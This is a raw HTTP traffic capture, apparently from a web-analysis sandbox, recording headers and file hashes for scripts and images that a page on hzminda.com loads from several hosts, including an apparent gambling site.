Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Thu, 31 Oct 2013 13:29:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"52725b42-370b"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5066
Md5:    e6fe27799e8a2cf7e952b2497b196c5b
Sha1:   b51f338f018e7548076f30ed0cff193509750594
Sha256: af89ac6aae2d279976de1a871624cd8b8d3c293fedb1340c959d6d71140b2e1a
                                        
                                            GET /images/blank.png HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:20 GMT
Content-Length: 213
Last-Modified: Sat, 25 May 2013 13:43:04 GMT
Connection: keep-alive
Etag: "51a0bfe8-d5"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 50 x 50, 1-bit colormap, non-interlaced
Size:   213
Md5:    95b471b54f3c8f5a8fc813e905a7a85b
Sha1:   6f0861e7465dd74d1f9fda5d97d918e8f5a04220
Sha256: 26a2ae8257988e34009cfed03c4876829bf05e650092d9e0b6aff50e9a4bc108
                                        
                                            GET /template/paody/js/home.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Tue, 21 Oct 2014 05:59:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5445f642-5360"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7582
Md5:    2acb3cf0f3d360afb351db2d3d8f1271
Sha1:   356562830dc3a2cdc2b9907a1884d520947305b2
Sha256: b09f3974d7bc1b7556576ea216d6752a27e59e6786ec965fd7cb874d721fe580
                                        
                                            GET /template/paody/aaaa/sou.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8383
Md5:    aa3580205499d885a62021c2ffc3f651
Sha1:   3890edc583f98c8ea4eb316a83254d86e763411b
Sha256: 1f029d1386eec0cfedf62dfc9cd00006500e2d538424391d48057474a9144d85
                                        
                                            GET /js/jquery.js HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:18 GMT
Last-Modified: Sat, 28 Sep 2013 03:06:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"524647c4-1319b"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   30146
Md5:    c5284e541681108eaded9b523d64ba2d
Sha1:   26093d8c49b196b765fd34b2780758621922499d
Sha256: 76eea62e4b7a10201614c00dec317e76ac852adef8ff762b5c5eec215523d498
                                        
                                            GET /js/groupa/jump_zq.js HTTP/1.1 
Host: www.aahuangg.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         122.10.3.60
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:19:39 GMT
Last-Modified: Thu, 06 Jul 2017 10:28:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"595e10b8-1960"
Expires: Mon, 17 Jul 2017 13:19:39 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2390
Md5:    42bc3606a83180e8bb7cfb372a8f37fb
Sha1:   48292c231b8a6d0f777db0479370b555a5cb3f50
Sha256: d063e5bba0ed89c8a97a6ff2420bceab585f33c1db03fdb3bd188f168671de2e
                                        
                                            GET /template/paody/images/logo.png HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:20 GMT
Content-Length: 8222
Last-Modified: Sat, 09 Nov 2013 02:22:40 GMT
Connection: keep-alive
Etag: "527d9c70-201e"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 240 x 75, 8-bit/color RGBA, non-interlaced
Size:   8222
Md5:    a07492831841972c04d908cff7e81d50
Sha1:   8b502b57aa498c1f85108a3eb5e555ebcc41df43
Sha256: cd902a1b505bba6d003e561c3f2ed3e67c1418c1325553a7577a64569db37943
                                        
                                            GET /template/paody/images/bg.png HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/template/paody/css/style.css
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:21 GMT
Content-Length: 5329
Last-Modified: Thu, 31 Jan 2013 18:04:18 GMT
Connection: keep-alive
Etag: "510ab222-14d1"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 113 x 419, 8-bit colormap, non-interlaced
Size:   5329
Md5:    0c1047d2390efa97557fcd5032b2fe27
Sha1:   9b665cd46c3d8a773a0cf8c0bda83c03ac486014
Sha256: fed02864cc9d52b4145a0915991e6dad53ebbd8ddff70b2b569214fe292c6d7b
                                        
                                            GET /template/paody/images/repeat.png HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/template/paody/css/style.css
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:21 GMT
Content-Length: 1161
Last-Modified: Thu, 31 Jan 2013 18:04:48 GMT
Connection: keep-alive
Etag: "510ab240-489"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 2 x 270, 8-bit colormap, non-interlaced
Size:   1161
Md5:    996e18c6e850bd30b06eec897eece277
Sha1:   b7e5607280a29e21974ba3af07e693dd64f7f4a3
Sha256: 83ed112186d8c71289617e28f9bc846d38a6ae9040e4f0e7b37b7855912a0c53
                                        
                                            GET /template/paody/images/home/loading.gif HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/template/paody/css/home.css
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:21 GMT
Content-Length: 1388
Last-Modified: Thu, 09 Aug 2007 01:00:00 GMT
Connection: keep-alive
Etag: "46ba6710-56c"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 16 x 16
Size:   1388
Md5:    c3d6947988790580587d57af4acd8d97
Sha1:   889897b6bc89c1198aa9c04710bf6afd6877b698
Sha256: d1c8e64dcc04555103890ff2c8c7b16a5c739846f9d419b57041f6131b49ec6f
                                        
                                            GET / HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Last-Modified: Mon, 17 Jul 2017 07:33:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"596c685b-520b"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3913
Md5:    67f9c420ff6c5ec22496b80ec4b04089
Sha1:   39596757eae894cb72f9a07698cc43ab34ff72f7
Sha256: f27f6005b24a59e3b67927261667a07bbf828f3fcad457907a5a5cdfb330644f
                                        
                                            GET /inc/timming.php?t=0.7892103196879626 HTTP/1.1 
Host: www.hzminda.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html
Cookie: PHPSESSID=borsnrf86j1s1c9lecr73ns662

                                         
                                         122.9.202.181
HTTP/1.1 200 OK
Content-Type: text/html;Charset=utf-8
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:14:23 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.41
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   20
Md5:    7029066c27ac6f5ef18d660d5741979a
Sha1:   46c6643f07aa7f6bfe7118de926b86defc5087c4
Sha256: 59869db34853933b239f1e2219cf7d431da006aa919635478511fabbfc8849d2
                                        
                                            GET /images/style.css HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Last-Modified: Tue, 28 Mar 2017 05:47:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"58d9f8dc-3404"
Expires: Mon, 17 Jul 2017 13:16:14 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3944
Md5:    92b784ff257663c7b5de9931c9bbb1ef
Sha1:   ff54759ced1428b2ba8d16dcd78f126de1d4c540
Sha256: 6bb785cffa2799f60f64aa245e3b0399c38e7fe9b723af3b38a970829d0e1340
                                        
                                            GET /upload/vod/2017-03-12/14892665815.jpg HTTP/1.1 
Host: www.zuidazy.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         104.20.84.83
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Mon, 17 Jul 2017 12:14:34 GMT
Content-Length: 29219
Connection: keep-alive
Set-Cookie: __cfduid=dc4fe8e516977876665ba63ba5d7829f51500293673; expires=Tue, 17-Jul-18 12:14:33 GMT; path=/; domain=.zuidazy.com; HttpOnly
Last-Modified: Sat, 11 Mar 2017 21:09:42 GMT
Etag: "58c46796-7223"
Expires: Wed, 16 Aug 2017 12:14:34 GMT
Cache-Control: public, max-age=2592000
CF-Cache-Status: MISS
Vary: Accept-Encoding
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 37fd1f25a7514273-OSL


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   29219
Md5:    9b5ea4299dbdcaafa449ab2a274761b6
Sha1:   da413c67c763cc63f5b38b8227f4d0c6e1b7d553
Sha256: 92684388824fa5b7147f1a85269f8fa44f4894104dcd975713e87b955b06869f
                                        
                                            GET /images/logo.png HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Content-Length: 9723
Last-Modified: Sat, 01 Apr 2017 03:17:41 GMT
Connection: keep-alive
Etag: "58df1bd5-25fb"
Expires: Wed, 16 Aug 2017 12:16:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 190 x 65, 8-bit/color RGBA, non-interlaced
Size:   9723
Md5:    c07312208b8bf06d3c3b608851ca5882
Sha1:   b681832fa704a06ecfaa8cfe7732cfb06edd7fdc
Sha256: e746fba3f2ba88f391da116ca8400c02c3fea6dc959185615124f321bd005286
                                        
                                            GET /images/slot.png HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:14 GMT
Content-Length: 534
Last-Modified: Mon, 27 Mar 2017 11:08:16 GMT
Connection: keep-alive
Etag: "58d8f2a0-216"
Expires: Wed, 16 Aug 2017 12:16:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 32 x 32, 8-bit/color RGBA, non-interlaced
Size:   534
Md5:    997d6bcf3bf654834b81b8c2e0891a70
Sha1:   3c6e851f3bf9aab5492da25cdd7e226e285f74ad
Sha256: 08def0ce8bf69ca628133023007693cc7047fc007f2ac0f1dc51f96b03b36f70
                                        
                                            GET /images/banco.png HTTP/1.1 
Host: tiantianfa.cc
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tiantianfa.cc/

                                         
                                         122.10.2.237
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Mon, 17 Jul 2017 12:16:15 GMT
Content-Length: 1033
Last-Modified: Mon, 27 Mar 2017 11:08:16 GMT
Connection: keep-alive
Etag: "58d8f2a0-409"
Expires: Wed, 16 Aug 2017 12:16:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 33 x 32, 8-bit/color RGBA, non-interlaced
Size:   1033
Md5:    ba453c238b6ddd2568d2a690c5808c46
Sha1:   55186997734dea6b426a407053342d081ee32e98
Sha256: 63f74f7810d9a719cedbc303f5de7e50fb1514eb85255b340e522c2002354715
                                        
                                            GET /upload/vod/2017-03-12/14892664754.jpg HTTP/1.1 
Host: www.zuidazy.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         104.20.84.83
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Mon, 17 Jul 2017 12:14:34 GMT
Content-Length: 52084
Connection: keep-alive
Set-Cookie: __cfduid=de741562b510bd3f7dab9e72471ea76cb1500293673; expires=Tue, 17-Jul-18 12:14:33 GMT; path=/; domain=.zuidazy.com; HttpOnly
Last-Modified: Sat, 11 Mar 2017 21:07:56 GMT
Etag: "58c4672c-cb74"
Expires: Wed, 16 Aug 2017 12:14:34 GMT
Cache-Control: public, max-age=2592000
CF-Cache-Status: MISS
Vary: Accept-Encoding
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 37fd1f25700e429d-OSL


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   52084
Md5:    c77a0cb449255862c24ac33e30cf6037
Sha1:   51336d645205856aeb7304fd99eb54a46ff89b12
Sha256: c6cd8cb584f5742793fa3e66acc66e9367be2502ed24a9ad162e1ca8c703d66f
                                        
                                            GET /050E00004FB44E089792733FCB0B62D5 HTTP/1.1 
Host: r3.ykimg.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         212.98.178.206
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 39539
Connection: keep-alive
Date: Tue, 20 Jun 2017 00:17:46 GMT
Accept-Ranges: bytes
Etag: "2539643279"
Last-Modified: Thu, 19 Sep 2013 13:42:12 GMT
Expires: Tue, 04 Feb 2020 22:51:26 GMT
Cache-Control: max-age=94608000
Server-Name: b01.tracker.b28
Via: cache1.l2hk1[0,200-0,H], cache31.l2hk1[1,0], cache8.by1[0,200-0,H], cache1.by1[1,0]
Age: 2375808
X-Cache: HIT TCP_HIT dirn:8:53706886
X-Swift-SaveTime: Thu, 22 Jun 2017 11:23:13 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: d462b28315002936744034542e


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   39539
Md5:    081c5b939ef3fa7cd381b617a945d895
Sha1:   87d37e3095eb6cbb498af79552d8c6b365850aa3
Sha256: 34769ec8f49fa2ef57f7d562f272a0581bf8f5afa445710bfd830b1e96adca7d
                                        
                                            GET /050E0000572168A467BC3C067E0B2926 HTTP/1.1 
Host: r4.ykimg.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         212.98.178.206
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 102658
Connection: keep-alive
Date: Sat, 24 Jun 2017 15:02:19 GMT
Accept-Ranges: bytes
Etag: "1069525884"
Last-Modified: Thu, 28 Apr 2016 01:42:39 GMT
Expires: Tue, 02 Jun 2020 06:21:50 GMT
Cache-Control: max-age=94608000
Server-Name: trackerD02.qd
Via: cache19.l2hk1[0,200-0,H], cache31.l2hk1[2,0], cache5.by1[0,200-0,H], cache4.by1[1,0]
Age: 1977135
X-Cache: HIT TCP_HIT dirn:5:499014392
X-Swift-SaveTime: Sat, 24 Jun 2017 16:13:41 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: d462b28615002936744205208e


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   102658
Md5:    5dbc442ac102fbbc198fa5aacded196e
Sha1:   9cb4a268461b1853613f81fe08af41843bc56de7
Sha256: 1058aab55c474e1d44782c5c272461c6fff698b449a90cb24843064e26d04c7a
                                        
                                            GET /preview/internettv/sp_images/ott/2016/dianshiju/294351/20160627164921106-new_220x308.jpg HTTP/1.1 
Host: 0img.mgtv.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         203.130.61.92
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Expires: Fri, 22 Jun 2018 11:23:14 GMT
Date: Thu, 22 Jun 2017 11:23:14 GMT
Server: nginx
Content-Length: 15862
Last-Modified: Mon, 27 Jun 2016 08:49:23 GMT
Etag: "5770e893-3df6"
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 wtong80:0 (Cdn Cache Server V2.0), 1.1 bd34:2 (Cdn Cache Server V2.0), 1.1 kf49:9 (Cdn Cache Server V2.0)
Connection: keep-alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   15862
Md5:    2442c1e16cf2817e44ac3d22fe5dd86e
Sha1:   06fb16dd1617b4e827d4e5e738449c4ca4baa103
Sha256: b42517bc422bc2aed22ca87c07393e390416cdb9ee5d43a6178878e4741d1c7a
                                        
                                            GET /preview/internettv/sp_images/ott/2016/dianying/295864/20160802120357951-new_220x308.jpg HTTP/1.1 
Host: 2img.mgtv.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         203.130.61.92
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Expires: Sat, 22 Jul 2017 11:23:15 GMT
Date: Thu, 22 Jun 2017 11:23:15 GMT
Server: nginx
Content-Length: 16349
Last-Modified: Tue, 02 Aug 2016 04:04:00 GMT
Etag: "57a01bb0-3fdd"
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 kwt54:3 (Cdn Cache Server V2.0), 1.1 bd34:2 (Cdn Cache Server V2.0), 1.1 flkf48:1 (Cdn Cache Server V2.0)
Connection: keep-alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   16349
Md5:    c2044c0ba1c82259b5d93cbe758e7093
Sha1:   a026b5fc0833fd0306900d439069633df352089d
Sha256: bdf07a8ace2e2b548f45a4b8236ee0a39d4c305f900ac50a2c158912346daa4f
                                        
                                            GET /preview/internettv/sp_images/ott/2016/dianshiju/48760/20160609132244057-new_220x308.jpg HTTP/1.1 
Host: 2img.mgtv.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hzminda.com/read/432089.html

                                         
                                         203.130.61.92
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Expires: Fri, 22 Jun 2018 11:23:16 GMT
Date: Thu, 22 Jun 2017 11:23:16 GMT
Server: nginx
Content-Length: 18827
Last-Modified: Thu, 09 Jun 2016 05:22:46 GMT
Etag: "5758fd26-498b"
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 wtong83:3 (Cdn Cache Server V2.0), 1.1 bd31:2 (Cdn Cache Server V2.0), 1.1 flkf48:8 (Cdn Cache Server V2.0)
Connection: keep-alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   18827
Md5:    790d1e386a8f2abd7193aba6671c72f6
Sha1:   a957a794349b99b7b7863bc5736b72a9201a66ec
Sha256: 2133d8611001b1489f85fdb126f4d43bb7d9c88e3c72afa56808649f515dbc41
                                        
                                            GET /050E00005729B14667BC3C53D20AB061 HTTP/1.1 
Host: r2.ykimg.com
                                        
